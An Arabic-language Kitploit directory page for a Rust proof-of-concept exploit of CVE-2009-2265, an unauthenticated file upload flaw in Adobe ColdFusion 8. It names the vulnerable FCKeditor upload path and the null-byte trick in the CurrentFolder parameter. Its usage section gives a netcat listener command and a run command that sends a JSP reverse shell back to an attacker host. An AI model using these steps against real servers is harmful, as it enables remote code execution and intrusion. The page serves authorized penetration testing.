Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2009-2265 — تنفيذ بلغة Rust لإثبات المفهوم (POC) لاستغلال CVE-2009-2265، ويستهدف Adobe ColdFusion 8. | Kitploit
أدوات/GitHubGitHub/nika0x38/cve-2009-2265
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubnika0x38/cve-2009-2265

CVE-2009-2265

تنفيذ بلغة Rust لإثبات المفهوم (POC) لاستغلال CVE-2009-2265، ويستهدف Adobe ColdFusion 8.

عرض المستودع
منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2009-2265 - ثغرة رفع ملفات وتنفيذ كود عن بُعد في Adobe ColdFusion 8

RustSecurity

تطبيق بلغة Rust لإثبات المفهوم (POC) الخاص باستغلال CVE-2009-2265، ويستهدف Adobe ColdFusion 8.


نظرة عامة على الثغرة

تسمح هذه الثغرة لمهاجم غير مصادق عليه برفع ملفات عشوائية إلى دليل يمكن الوصول إليه عبر الويب على خادم يعمل بنظام Adobe ColdFusion 8، مما يؤدي إلى تنفيذ كود عن بُعد (RCE).

التفاصيل التقنية

  • الثغرة: تجاوز الدلائل عبر حقن البايت الفارغ
  • المكوّن: موصل FCKeditor upload.cfm
  • المُعامِل: CurrentFolder
  • التأثير: تنفيذ كود عن بُعد (RCE)
  • البرمجيات المتأثرة: Adobe ColdFusion 8.0.1 والإصدارات الأقدم

الوصف

توجد الثغرة في وظيفة رفع الملفات بمكوّن FCKeditor الموجود في المسار /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm. لا يتم تنظيف مُعامِل HTTP GET المُسمى CurrentFolder بشكل صحيح، مما يسمح بهجوم حقن بايت فارغ (%00).

من خلال صياغة طلب يتم فيه تعيين مُعامِل CurrentFolder إلى /<filename>.jsp%00، يمكن للمهاجم تجاوز فحوصات امتداد الملفات من جانب الخادم. يفسّر النظام الأساسي (غالبًا Java) البايت الفارغ على أنه نهاية السلسلة النصية، فيتعامل مع اسم الملف على أنه <filename>.jsp. يسمح ذلك للمهاجم برفع ملف JSP خبيث. يحفظ الخادم هذا الملف في دليل يمكن الوصول إليه بشكل عام (/userfiles/file/)، ويمكن تنفيذه بمجرد الوصول إلى عنوان URL الخاص به.

يقوم إثبات المفهوم (POC) هذا بأتمتة العملية عن طريق إنشاء حمولة جافا JSP لصدفة عكسية، ورفعها باستخدام ثغرة البايت الفارغ، ثم تشغيلها للحصول على شل على النظام المستهدف.

الاستخدام

اتبع هذه الخطوات لتجميع الاستغلال وتشغيله.

الخطوة 1: إعداد مستمع Netcat

قبل تشغيل الاستغلال، ابدأ مستمعًا على جهازك المحلي لاستقبال الصدفة العكسية الواردة.

root@kitploit:~

nc -lnvp <attacker-port>

الخطوة 2: تشغيل الاستغلال

نفّذ الملف الثنائي المُجمَّع، مع توفير المضيف/المنفذ المحلي للصدفة العكسية والمضيف/المنفذ الخاص بالهدف البعيد.

root@kitploit:~

cargo run -- --lhost <LHOST> --lport <LPORT> --rhost <RHOST> --rport <RPORT>

بعد أن يقوم السكربت بتشغيل الحمولة، يجب أن تستقبل اتصالًا على مستمع Netcat الخاص بك.

إخلاء مسؤولية

هذه الأداة مخصصة للأغراض التعليمية واختبار الاختراق المصرح به فقط. استخدمها بمسؤولية وفقط على الأنظمة التي تملكها أو لديك إذن صريح لاستخدامها.

تنزيل الأداة